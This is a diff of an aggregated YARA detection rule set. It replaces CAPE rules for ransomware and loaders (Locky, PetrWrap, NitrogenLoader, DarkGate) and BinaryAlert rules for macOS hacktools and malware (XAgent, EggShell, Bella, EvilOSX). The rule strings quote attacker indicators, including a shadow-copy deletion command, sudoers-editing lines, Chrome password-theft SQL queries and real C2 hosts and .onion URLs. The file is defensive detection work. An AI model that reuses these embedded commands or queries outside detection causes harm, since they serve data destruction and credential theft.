-		$content_type = {F6 CE 56 F4 76 F6 96 2E 86 C6 96 36 0E 0E 86 04 5C A6 0E 9E 2A B4 2E 76 A6 2E 76 F6 C2}
-		$domain = {44 5C 44 76 96 86 B6 F6 26 44 34 44}
-		$id = {44 5C 44 64 96 44 DE}
-		$ip_local = {44 5C 44 36 86 C6 F6 36 FA 0E 96 44 34 44}
-		$table_part_1 = {00 80 40 C0 20 A0 60 E0 10 90 50 D0 30 B0 70 F0 08 88 48 C8 28 A8 68}
-		$table_part_2 = {97 57 D7 37 B7 77 F7 0F 8F 4F CF 2F AF 6F EF 1F 9F 5F DF 3F BF 7F FF}
-		$decode = {0F B6 0? 8D ?? FF 8A [2] 0F B6 80 [4] 88 04 ?? 46 0F B6 C? 0F B6 80 [4] 88 4? 01 3B F7}
+		$antihook = {FF D? 83 EC 08 9C 81 0C 24 00 01 00 00 9D}
 
 	condition:
-		4 of them
+		any of them
 }
-rule CAPE_Locky : FILE
+rule CAPE_Loadersyscall
 {
 	meta:
-		description = "Locky Payload"
-		author = "kevoreilly"
-		id = "664d0365-af49-5222-a4ed-9260332f6940"
-		date = "2022-06-09"
-		modified = "2022-06-09"
+		description = "Loader Syscall"
+		author = "enzok"
+		id = "45193b38-938e-55cf-9ea0-7bd48f0d77e4"
+		date = "2024-12-02"
+		modified = "2024-12-02"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/data/yara/CAPE/Locky.yar#L1-L14"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/LICENSE"
-		logic_hash = "9786c54a2644d9581fefe64be11b26e22806398e54e961fa4f19d26eae039cd7"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/analyzer/windows/data/yara/NitrogenLoader.yar#L1-L13"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/LICENSE"
+		logic_hash = "3c7ffd8b95032cffecff7fa7e5f5f561cce13e1109f6a9b30bc743642b495e45"
 		score = 75
 		quality = 70
-		tags = "FILE"
-		cape_type = "Locky Payload"
+		tags = ""
+		cape_options = "sysbp=$syscall*-2,count=0"
 
 	strings:
-		$string1 = "wallet.dat" wide
-		$string2 = "Locky_recover" wide
-		$string3 = "opt321" wide
+		$makehashes = {48 89 4C 24 ?? 48 89 54 24 ?? 4? 89 44 24 ?? 4? 89 4C 24 ?? 4? 83 EC ?? B? [4] E8 [3] 00}
+		$number = {49 89 C3 B? [4] E8 [3] 00}
+		$syscall = {48 83 C4 ?? 4? 8B 4C 24 ?? 4? 8B 54 24 ?? 4? 8B 44 24 ?? 4? 8B 4C 24 ?? 4? 89 CA 4? FF E3}
 
 	condition:
-		uint16( 0 ) == 0x5A4D and all of them
+		all of them
 }
-rule CAPE_Petrwrap : FILE
+rule CAPE_Nitrogenloaderaes
 {
 	meta:
-		description = "PetrWrap Payload"
-		author = "kevoreilly"
-		id = "83762c87-6e96-50fe-b297-e1a5f893be43"
-		date = "2022-06-09"
-		modified = "2022-06-09"
+		description = "NitrogenLoader AES and IV"
+		author = "enzok"
+		id = "c79a00af-52f9-5f07-9c58-e8964e70986f"
+		date = "2024-12-02"
+		modified = "2024-12-02"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/data/yara/CAPE/PetrWrap.yar#L1-L15"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/LICENSE"
-		logic_hash = "6dd1cf5639b63d0ab41b24080dad68d285f2e3969ad34fd724c83e7a0dd4b968"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/analyzer/windows/data/yara/NitrogenLoader.yar#L15-L27"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/LICENSE"
+		logic_hash = "de8ed0e98948cfadfd579e334fd9ce9f777ddbd988de897529ba71cb5eb2d396"
 		score = 75
 		quality = 70
-		tags = "FILE"
-		cape_type = "PetrWrap Payload"
+		tags = ""
+		cape_options = "bp0=$keyiv0+8,action0=dump:ecx::64,hc0=1,bp1=$keyiv0*-4,action1=dump:ecx::32,hc1=1,count=0"
 
 	strings:
-		$a1 = "http://petya3jxfp2f7g3i.onion/"
-		$a2 = "http://petya3sen7dyko2n.onion"
-		$b1 = "http://mischapuk6hyrn72.onion/"
-		$b2 = "http://mischa5xyix2mrhd.onion/"
+		$keyiv0 = {48 8B 8C 24 [4] E8 [3] 00 4? 89 84 24 [4] 4? 8B 84 24 [4] 4? 89 84 24 [4] 4? 8B 8C 24 [4] E8 [3] 00}
+		$keyiv1 = {48 89 84 24 [4] 4? 8B 84 24 [4] 4? 8B 94 24 [4] 4? 8D 8C 24 [4] E8 [3] FF}
+		$keyiv2 = {48 63 84 24 [4] 4? 8B C0 4? 8B 94 24 [4] 4? 8D 8C 24 [4] E8 [3] FF 4? 8B 84 24}
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( any of ( $a* ) ) and ( any of ( $b* ) )
+		all of them
 }
-rule CAPE_Doppelpaymer : FILE
+rule CAPE_Nitrogenloaderbypass
 {
 	meta:
-		description = "DoppelPaymer Payload"
-		author = "kevoreilly"
-		id = "c8178906-1722-5908-9ad4-7ee1eef39138"
-		date = "2022-06-27"
-		modified = "2022-06-27"
+		description = "Nitrogen Loader Exit Bypass"
+		author = "enzok"
+		id = "397b0b79-d569-5a71-bcac-ce0d64f706e6"
+		date = "2024-12-02"
+		modified = "2024-12-02"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/data/yara/CAPE/DoppelPaymer.yar#L1-L13"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/LICENSE"
-		logic_hash = "73a2575671bafc31a70af3ce072d6f94ae172b12202baebba586a02524cb6f9d"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/analyzer/windows/data/yara/NitrogenLoader.yar#L29-L41"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/LICENSE"
+		logic_hash = "3a034d3ddd18723ea1f91814c8c2a2c47a749dfd1496a5d4777d8ff8bfab3457"
 		score = 75
 		quality = 70
-		tags = "FILE"
-		cape_type = "DoppelPaymer Payload"
+		tags = ""
+		cape_options = "bp2=$exit-2,action2=jmp,count=0"
 
 	strings:
-		$getproc32 = {81 FB ?? ?? ?? ?? 74 2D 8B CB E8 ?? ?? ?? ?? 85 C0 74 0C 8B C8 8B D7 E8 ?? ?? ?? ?? 5B 5F C3}
-		$cmd_string = "Setup run\\n" wide
+		$string1 = "LoadResource"
+		$syscall = {48 83 C4 ?? 4? 8B 4C 24 ?? 4? 8B 54 24 ?? 4? 8B 44 24 ?? 4? 8B 4C 24 ?? 4? 89 CA 4? FF E3}
+		$exit = {33 C9 E8 [4] E8 [4] 48 8D 84 24 [4] 48 89 44 24 ?? 4? B? E4 00 00 00 4? 8B 05 [4] B? 03 00 00 00 48 8D}
 
 	condition:
-		uint16( 0 ) == 0x5A4D and all of them
+		all of them
 }
-rule CAPE_Atlas : FILE
+rule CAPE_Nitrogenloaderconfig
 {
 	meta:
-		description = "Atlas Payload"
-		author = "kevoreilly"
-		id = "22322e5c-ded6-56df-8a39-a8f5cbc18239"
-		date = "2019-10-30"
-		modified = "2019-10-30"
+		description = "NitrogenLoader Config Extraction"
+		author = "enzok"
+		id = "a23d7012-b7b2-5313-9974-d65c1364c630"
+		date = "2024-12-02"
+		modified = "2024-12-02"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/data/yara/CAPE/Atlas.yar#L1-L13"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/LICENSE"
-		logic_hash = "c3f73b29df5caf804dbfe3e6ac07a9e2c772bd2a126f0487e4a65e72bd501e6e"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/analyzer/windows/data/yara/NitrogenLoader.yar#L43-L54"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/LICENSE"
+		logic_hash = "a1f9e95b8039b16e3926b7288c036e81cf72b2dbb91ab9e69125f18d89fa1a03"
 		score = 75
 		quality = 70
-		tags = "FILE"
-		cape_type = "Atlas Payload"
+		tags = ""
+		cape_options = "bp0=$decrypt1*+6,hc0=1,count=0,action0=string:rcx,typestring=NitrogenLoader Config"
 
 	strings:
-		$a1 = "bye.bat"
-		$a2 = "task=knock&id=%s&ver=%s x%s&disks=%s&other=%s&ip=%s&pub="
-		$a3 = "process call create \"cmd /c start vssadmin delete shadows /all /q"
+		$decrypt1 = {48 8B 8C 24 [4] 0F B6 04 01 89 ?? 24 [1-4] 48 63 4C 24 ?? 33 D2 48 8B C1 48 F7 B4 24 [4] 48 8B C2 48 8B 8C}
+		$decrypt2 = {8B ?? 24 [1-4] 33 C8 8B C1 48 63 4C 24 ?? 48 8B 94 24 [4] 88 04 0A}
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( all of ( $a* ) )
+		all of them
 }
-rule CAPE_Ramnit : FILE
+rule CAPE_Darkgateloader
 {
 	meta:
-		description = "Ramnit Payload"
-		author = "kevoreilly"
-		id = "6df92055-05f6-5985-9268-b9c85e143567"
-		date = "2019-10-30"
-		modified = "2019-10-30"
+		description = "DarkGate Loader"
+		author = "enzok"
+		id = "feb90ae6-ec01-59da-a3df-217df2133588"
+		date = "2025-04-07"
+		modified = "2025-04-07"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/data/yara/CAPE/Ramnit.yar#L1-L13"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/3468ef14dbf65c0c3219e32830860967d6da51d5/LICENSE"
-		logic_hash = "6f661f47bdf8377b0fb96f190fcb964c0ed2b43ce7ae7880f9dfce9e43837efd"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/analyzer/windows/data/yara/DarkGateLoader.yar#L1-L15"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/0ae5d09a6a783302535883359d2b13437136d95e/LICENSE"
+		logic_hash = "00692123615d2f7eaf8aea07754fc9439cf58e1fb8eb4f44f0428b362f27e794"
 		score = 75
 		quality = 70
-		tags = "FILE"
-		cape_type = "Ramnit Payload"
+		tags = ""
+		cape_options = "bp0=$decrypt1+30,bp0=$decrypt2+29,action0=dump:eax::ebx,bp1=$decrypt3+80,action1=dumpsize:eax,bp2=$decrypt3+124,hc2=1,action2=dump:eax,count=0"
+		packed = "b15e4b4fcd9f0d23d902d91af9cc4e01417c426e55f6e0b4ad7256f72ac0231a"
 
 	strings:
-		$DGA = {33 D2 B9 1D F3 01 00 F7 F1 8B C8 B8 A7 41 00 00 F7 E2 8B D1 8B C8 B8 14 0B 00 00 F7 E2 2B C8 33 D2 8B C1 8B}
-		$xor_loop = {83 7D 0C 00 74 27 83 7D 14 00 74 21 8B 4D 0C 8B 7D 08 8B 75 10 BA 00 00 00 00 0B D2 75 04 8B 55 14 4A 8A 1C 32 32 1F 88 1F 47 4A E2 ED}
-		$id_string = "{%08X-%04X-%04X-%04X-%08X%04X}"
+		$loader = "loader"
+		$decrypt1 = {B? 01 00 00 00 8B [3] E8 [4] 8B D7 32 54 [4] 88 54 18 FF 4? 4? 75}
+		$decrypt2 = {B? 01 00 00 00 8B [2] E8 [4] 8B D7 2B D3 [4] 88 54 18 FF 4? 4? 75}
+		$decrypt3 = {89 85 [4] 8B 85 [4] 8B F0 8D BD [4] B? 10 [3] F3 A5 8B 85 [4] 33 D2 [2] 8B 85 [4] 99}
 
 	condition:
-		uint16( 0 ) == 0x5A4D and all of ( $* )
+		$loader and any of ( $decrypt* )
 }
 /*
  * YARA Rule Set
  * Repository Name: BinaryAlert
  * Repository: https://github.com/airbnb/binaryalert/
- * Retrieval Date: 2025-06-08
+ * Retrieval Date: 2025-06-15
  * Git Commit: a9c0f06affc35e1f8e45bb77f835b92350c68a0b
- * Number of Rules: 80
+ * Number of Rules: 78
  * Skipped: 0 (age), 1 (quality), 0 (score), 0 (importance)
  *
  *
@@ -64218,39 +64831,6 @@ rule CAPE_Ramnit : FILE
    limitations under the License.
 
  */
-private rule BINARYALERT_Cobaltstrike_Template_Exe_PRIVATE : FILE
-{
-	meta:
-		description = "Template to provide executable detection Cobalt Strike payloads"
-		author = "@javutin, @joseselvi"
-		id = "39c27acf-1264-584d-99e0-77b0e9352078"
-		date = "2017-12-14"
-		modified = "2017-12-14"
-		reference = "https://www.cobaltstrike.com"
-		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/hacktool/windows/hacktool_windows_cobaltstrike_template.yara#L1-L28"
-		license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE"
-		logic_hash = "492b2b0b319509fe26473add6ca50c246a0c30fb8a7f9e2631c8d3e9e146c611"
-		score = 75
-		quality = 80
-		tags = "FILE"
-
-	strings:
-		$compiler = "mingw-w64 runtime failure" nocase
-		$f1 = "VirtualQuery" fullword
-		$f2 = "VirtualProtect" fullword
-		$f3 = "vfprintf" fullword
-		$f4 = "Sleep" fullword
-		$f5 = "GetTickCount" fullword
-		$c1 = { // Compare case insensitive with "msvcrt", char by char
-                0f b6 50 01 80 fa 53 74 05 80 fa 73 75 42 0f b6
-                50 02 80 fa 56 74 05 80 fa 76 75 34 0f b6 50 03
-                80 fa 43 74 05 80 fa 63 75 26 0f b6 50 04 80 fa
-                52 74 05 80 fa 72 75 18 0f b6 50 05 80 fa 54 74
-        }
-
-	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 1000KB and $compiler and all of ( $f* ) and all of ( $c* )
-}
 private rule BINARYALERT_Macho_PRIVATE : FILE
 {
 	meta:
@@ -64314,2164 +64894,2144 @@ rule BINARYALERT_Eicar_Substring_Test
 	condition:
 		all of them
 }
-rule BINARYALERT_Hacktool_Macos_Exploit_Cve_5889
+rule BINARYALERT_Malware_Macos_Apt_Sofacy_Xagent
 {
 	meta:
-		description = "No description has been set in the source file - BinaryAlert"
+		description = "sofacy xagent for macOS"
 		author = "@mimeframe"
-		id = "ea70d31c-1b70-5927-ba8d-e13d2114e74e"
+		id = "91bef771-2ef1-58f6-ae01-3bdde4cc003c"
 		date = "2017-09-12"
 		modified = "2017-09-12"
-		reference = "https://www.exploit-db.com/exploits/38371/"
-		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/hacktool/macos/hacktool_macos_exploit_cve_2015_5889.yara#L1-L16"
+		reference = "https://blog.malwarebytes.com/cybercrime/2017/03/two-new-mac-backdoors-discovered/"
+		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/malware/macos/malware_macos_apt_sofacy_xagent.yara#L3-L62"
 		license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE"
-		logic_hash = "b455759ea369cdcf2f05a2735a38000179ebe644667016cd635dfad9beda4459"
+		hash = "4fe4b9560e99e33dabca553e2eeee510"
+		logic_hash = "d4b1096e4aeb8382e5abf93d3ecf71cd6ae2ed7afbc9a38549a2fc2739539674"
 		score = 75
-		quality = 80
+		quality = 55
 		tags = ""
 
 	strings:
-		$a1 = "/etc/sudoers" fullword wide ascii
-		$a2 = "/etc/crontab" fullword wide ascii
-		$a3 = "* * * * * root echo" wide ascii
-		$a4 = "ALL ALL=(ALL) NOPASSWD: ALL" wide ascii
-		$a5 = "/usr/bin/rsh" fullword wide ascii
-		$a6 = "localhost" fullword wide ascii
+		$a1 = "remoteShell" ascii wide
+		$a2 = "getInfoOSX" ascii wide
+		$a3 = "ftpUpload" ascii wide
+		$a4 = "startUploading" ascii wide
+		$a5 = "deleteFile:" ascii wide
+		$a6 = "executeShellCommand" ascii wide
+		$a7 = "getFirefoxPassword" ascii wide
+		$a8 = "generateRandomPathAndName" ascii wide
+		$a9 = "createCryptPacket" ascii wide
+		$a10 = "CameraShot" ascii wide
+		$a11 = "7Cryptor" ascii wide
+		$a12 = "8ICryptor" ascii wide
+		$a13 = "Keylogger" ascii wide
+		$a14 = "BootXLoader" ascii wide
+		$a15 = "InjectApp" ascii wide
+		$b1 = "/Project/XAgentOSX/" ascii wide
+		$b2 = "XLoader_OSX" fullword ascii wide
+		$b3 = "<span class='keylog_user_keys'>" ascii wide
+		$b4 = "<span class='keylog_process'>" ascii wide
+		$b5 = "<span class='keylog_spec_key'>" ascii wide
+		$b6 = "<font size=4 color=red><pre>Stop take screenshot</pre></font>" ascii wide
+		$c1 = "http://23.227.196.215/" ascii wide
+		$c2 = "http://apple-iclods.org/" ascii wide
+		$c3 = "http://apple-checker.org/" ascii wide
+		$c4 = "http://apple-uptoday.org/" ascii wide
+		$c5 = "http://apple-search.info" ascii wide
+		$d1 = "watch/?" fullword ascii wide
+		$d2 = "search/?" fullword ascii wide
+		$d3 = "find/?" fullword ascii wide
+		$d4 = "results/?" fullword ascii wide
+		$d5 = "open/?" fullword ascii wide
+		$d6 = "search/?" fullword ascii wide
+		$d7 = "close/?" fullword ascii wide
+		$e1 = "itwm=" fullword ascii wide
+		$e2 = "text=" fullword ascii wide
+		$e3 = "from=" fullword ascii wide
+		$e4 = "itwm=" fullword ascii wide
+		$e5 = "ags=" fullword ascii wide
+		$e6 = "btnG=" fullword ascii wide
+		$e7 = "oprnd=" fullword ascii wide
+		$e8 = "itwm=" fullword ascii wide
+		$e9 = "utm=" fullword ascii wide
+		$e10 = "channel=" fullword ascii wide
 
 	condition:
-		all of ( $a* )
+		BINARYALERT_Macho_PRIVATE and ( 5 of ( $a* ) or any of ( $b* ) or any of ( $c* ) or 4 of ( $d* ) or 5 of ( $e* ) )
 }
-rule BINARYALERT_Hacktool_Macos_Exploit_Tpwn
+rule BINARYALERT_Malware_Macos_Neoneggplant_Eggshell
 {
 	meta:
-		description = "tpwn exploits a null pointer dereference in XNU to escalate privileges to root."
+		description = "EggShell is an iOS and macOS post exploitation surveillance pentest tool written in Python."
 		author = "@mimeframe"
-		id = "b69c4e1c-554e-5553-9b21-6cdf33aff24e"
-		date = "2017-09-14"
-		modified = "2017-09-14"
-		reference = "https://www.rapid7.com/db/modules/exploit/osx/local/tpwn"
-		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/hacktool/macos/hacktool_macos_exploit_tpwn.yara#L1-L14"
+		id = "274a34cc-9403-50e6-aa64-683a41bc30e6"
+		date = "2017-09-12"
+		modified = "2017-09-12"
+		reference = "https://github.com/neoneggplant/EggShell"
+		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/malware/macos/malware_macos_neoneggplant_eggshell.yara#L1-L24"
 		license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE"
-		logic_hash = "f864d8c137746edd50526b1d3d95a7335f776cf1473d2d2ea28856dbc515dd9f"
-		score = 75
+		logic_hash = "34906db9398313ccb84e67bd98e94324c628aefe3efa6ba3cca2df042b42cbe7"
+		score = 50
 		quality = 80
 		tags = ""
 
 	strings:
-		$a1 = "[-] Couldn't find a ROP gadget, aborting." wide ascii
-		$a2 = "leaked kaslr slide," wide ascii
-		$a3 = "didn't get root, but this system is vulnerable." wide ascii
-		$a4 = "Escalating privileges! -qwertyoruiop" wide ascii
+		$a1 = "Created By Lucas Jackson (@neoneggplant)" wide ascii
+		$a2 = "SET LHOST (Leave blank for" wide ascii
+		$a3 = "SET LPORT (Leave blank for" wide ascii
+		$b1 = "/tmp/.esplog" wide ascii
+		$b2 = "spGHbigdxMBJpbOCAr3rnS3inCdYQyZV" wide ascii
+		$b3 = "keylogclear" wide ascii
+		$b4 = "getpasscode" wide ascii
+		$c1 = "spGHbigdxMBJpbOCAr3rnS3inCdYQyZV" wide ascii
+		$c2 = "getfacebook" wide ascii
+		$c3 = "type is eggsu" wide ascii
+		$c4 = "rmpersistence" wide ascii
 
 	condition:
-		2 of ( $a* )
+		all of ( $a* ) or 3 of ( $b* ) or 3 of ( $c* )
 }
-rule BINARYALERT_Hacktool_Macos_Manwhoami_Osxchromedecrypt
+rule BINARYALERT_Malware_Macos_Proton_Rat_Generic
 {
 	meta:
-		description = "Decrypt Google Chrome / Chromium passwords and credit cards on macOS / OS X."
+		description = "No description has been set in the source file - BinaryAlert"
 		author = "@mimeframe"
-		id = "874cc999-d9c2-5017-83ec-e4be8a659476"
-		date = "2017-09-12"
-		modified = "2017-09-12"
-		reference = "https://github.com/manwhoami/OSXChromeDecrypt"
-		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/hacktool/macos/hacktool_macos_manwhoami_osxchromedecrypt.yara#L1-L16"
+		id = "75cfaaff-e8d7-5cd4-953b-7d2011139725"
+		date = "2017-08-11"
+		modified = "2017-08-11"
+		reference = "https://objective-see.com/blog/blog_0x1D.html"
+		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/malware/macos/malware_macos_proton_rat_generic.yara#L3-L21"
 		license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE"
-		logic_hash = "0974c6a5e7875e20380df0f58bf22a589b9a5c718e635ec77b42060abcf99473"
+		hash = "6a2d0c8b20efc3fa283176a4bc76d6fd"
+		logic_hash = "b7d8660320564cba1d8e2d53d1fdc75509140c7e87a572b27931c62201df2d22"
 		score = 75
-		quality = 80
+		quality = 64
 		tags = ""
 
 	strings:
-		$a1 = "Credit Cards for Chrome Profile" wide ascii
-		$a2 = "Passwords for Chrome Profile" wide ascii
-		$a3 = "Unknown Card Issuer" wide ascii
-		$a4 = "ERROR getting Chrome Safe Storage Key" wide ascii
-		$b1 = "select name_on_card, card_number_encrypted, expiration_month, expiration_year from credit_cards" wide ascii
-		$b2 = "select username_value, password_value, origin_url, submit_element from logins" wide ascii
+		$a1 = "SRWebSocket" nocase wide ascii
+		$a2 = "SocketRocket" nocase wide ascii
+		$b1 = "SSH tunnel not launched" nocase wide ascii
+		$b2 = "SSH tunnel still running" nocase wide ascii
+		$b3 = "SSH tunnel already launched" nocase wide ascii
+		$b4 = "Entering interactive session." nocase wide ascii
 
 	condition:
-		3 of ( $a* ) or all of ( $b* )
+		BINARYALERT_Macho_PRIVATE and any of ( $a* ) and any of ( $b* )
 }
-rule BINARYALERT_Hacktool_Macos_Keylogger_Logkext
+rule BINARYALERT_Malware_Macos_Bella
 {
 	meta:
-		description = "LogKext is an open source keylogger for Mac OS X, a product of FSB software."
+		description = "Bella is a pure python post-exploitation data mining tool & remote administration tool for macOS."
 		author = "@mimeframe"
-		id = "2e4ad9d0-5780-5a28-a76d-baac401b0648"
+		id = "ca4ab508-8c97-5307-9aaf-db10cfd6ab35"
 		date = "2017-09-12"
 		modified = "2017-09-12"
-		reference = "https://github.com/SlEePlEs5/logKext"
-		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/hacktool/macos/hacktool_macos_keylogger_logkext.yara#L1-L25"
+		reference = "https://github.com/Trietptm-on-Security/Bella"
+		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/malware/macos/malware_macos_bella.yara#L1-L22"
 		license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE"
-		logic_hash = "f0e3a7ea8ec4568c319e44f00d71fb368948b6fe08bdf86de4b33f0d2bafbb44"
+		logic_hash = "b9c063b5ec8604958d3417ec8640da4314ebcf60ee55413a2f6fa8d138311614"
 		score = 75
 		quality = 80
 		tags = ""
 
 	strings:
-		$a1 = "logKextPassKey" wide ascii
-		$a2 = "Couldn't get system keychain:" wide ascii
-		$a3 = "Error finding secret in keychain" wide ascii
-		$a4 = "com_fsb_iokit_logKext" wide ascii
-		$b1 = "logKext Password:" wide ascii
-		$b2 = "Logging controls whether the daemon is logging keystrokes (default is on)." wide ascii
-		$c1 = "logKextPassKey" wide ascii
-		$c2 = "Error: couldn't create secAccess" wide ascii
-		$d1 = "IOHIKeyboard" wide ascii
-		$d2 = "Clear keyboards called with kextkeys" wide ascii
-		$d3 = "Added notification for keyboard" wide ascii
+		$a1 = "Verified! [2FV Enabled] Account ->" wide ascii
+		$a2 = "There is no root shell to perform this command. See [rooter] manual entry." wide ascii
+		$a3 = "Attempt to escalate Bella to root through a variety of attack vectors." wide ascii
+		$a4 = "BELLA IS NOW RUNNING. CONNECT TO BELLA FROM THE CONTROL CENTER." wide ascii
+		$b1 = "user_pass_phish" fullword wide ascii
+		$b2 = "bella_info" fullword wide ascii
+		$b3 = "get_root" fullword wide ascii
+		$c1 = "Please specify a bella server." wide ascii
+		$c2 = "What port should Bella connect on [Default is 4545]:" wide ascii
 
 	condition:
-		3 of ( $a* ) or all of ( $b* ) or all of ( $c* ) or all of ( $d* )
+		any of ( $a* ) or all of ( $b* ) or all of ( $c* )
 }
-rule BINARYALERT_Hacktool_Macos_Keylogger_Roxlu_Ofxkeylogger
+rule BINARYALERT_Malware_Macos_Macspy : FILE
 {
 	meta:
-		description = "ofxKeylogger keylogger."
-		author = "@mimeframe"
-		id = "c0e00b76-9623-5709-b64b-0afe006eba60"
-		date = "2017-09-12"
-		modified = "2017-09-12"
-		reference = "https://github.com/roxlu/ofxKeylogger"
-		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/hacktool/macos/hacktool_macos_keylogger_roxlu_ofxkeylogger.yara#L1-L13"
+		description = "macSpy is a malware-as-a-service (MaaS) product advertised as the most sophisticated Mac spyware ever"
+		author = "AlienVault Labs"
+		id = "5f9a5ed5-a982-552c-a6df-326228eaf459"
+		date = "2017-08-11"
+		modified = "2017-08-11"
+		reference = "https://www.alienvault.com/blogs/labs-research/macspy-os-x-rat-as-a-service"
+		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/malware/macos/malware_macos_macspy.yara#L3-L17"
 		license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE"
-		logic_hash = "6e2579a10327cc8f1799848b3bcbcd95733a31098faeb849df6ebf99f1ffe808"
+		hash = "6c03e4a9bcb9afaedb7451a33c214ae4"
+		logic_hash = "f04648860c9602e43516113000908008847dacfbe189d79e13737bcd034b68a0"
 		score = 75
 		quality = 80
-		tags = ""
+		tags = "FILE"
 
 	strings:
-		$a1 = "keylogger_init" wide ascii
-		$a2 = "install_keylogger_hook function not found in dll." wide ascii
-		$a3 = "keylogger_set_callback" wide ascii
+		$header0 = {cf fa ed fe}
+		$header1 = {ce fa ed fe}
+		$header2 = {ca fe ba be}
+		$c1 = { 76 31 09 00 76 32 09 00 76 33 09 00 69 31 09 00 69 32 09 00 69 33 09 00 69 34 09 00 66 31 09 00 66 32 09 00 66 33 09 00 66 34 09 00 74 63 3A 00 }
 
 	condition:
-		all of ( $a* )
+		($header0 at 0 or $header1 at 0 or $header2 at 0 ) and $c1
 }
-rule BINARYALERT_Hacktool_Macos_Keylogger_Giacomolaw
+rule BINARYALERT_Malware_Macos_Marten4N6_Evilosx
 {
 	meta:
-		description = "A simple keylogger for macOS."
+		description = "EvilOSX is a pure python, post-exploitation, RAT (Remote Administration Tool) for macOS / OSX."
 		author = "@mimeframe"
-		id = "81fcf792-a0a9-5b97-a71c-4c517a7b910c"
+		id = "2b2e62ca-f95c-55c5-aaf6-985aab49dfbb"
 		date = "2017-09-12"
 		modified = "2017-09-12"
-		reference = "https://github.com/GiacomoLaw/Keylogger"
-		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/hacktool/macos/hacktool_macos_keylogger_giacomolaw.yara#L1-L13"
+		reference = "https://github.com/Marten4n6/EvilOSX"
+		source_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/rules/public/malware/macos/malware_macos_marten4n6_evilosx.yara#L1-L16"
 		license_url = "https://github.com/airbnb/binaryalert//blob/a9c0f06affc35e1f8e45bb77f835b92350c68a0b/LICENSE"
-		logic_hash = "45ca583c07b8593ed716306ae6f80eef1c3fc5652aed739454fa8007fae929b4"
+		logic_hash = "3402ebf34fd507d0c317416bf77bb3d51b67c8b0f099ce68d15ade6a6a2e302a"
 		score = 75
 		quality = 80
 		tags = ""
 
 	strings:
-		$a1 = "ERROR: Unable to access keystroke log file. Please make sure you have the correct permissions." wide ascii
